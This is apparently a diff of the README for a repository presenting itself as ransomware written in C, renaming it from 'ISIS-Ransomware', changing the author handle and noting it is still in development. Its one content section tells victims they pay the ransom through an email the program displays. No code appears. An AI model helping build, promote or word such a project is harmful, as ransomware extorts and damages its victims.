CPT-Jack-A-Castle/SIS-Ransomware-made-in-C/README.md

-# ISIS-Ransomware
+# SIS-Ransomware
-- By: fed#1234 / not yet finished
+- By: TigerMate / not yet finished
+- Under Devoloping Mode

 # Paying the Ransom
 - you'll have to pay through the email that shows when you run the program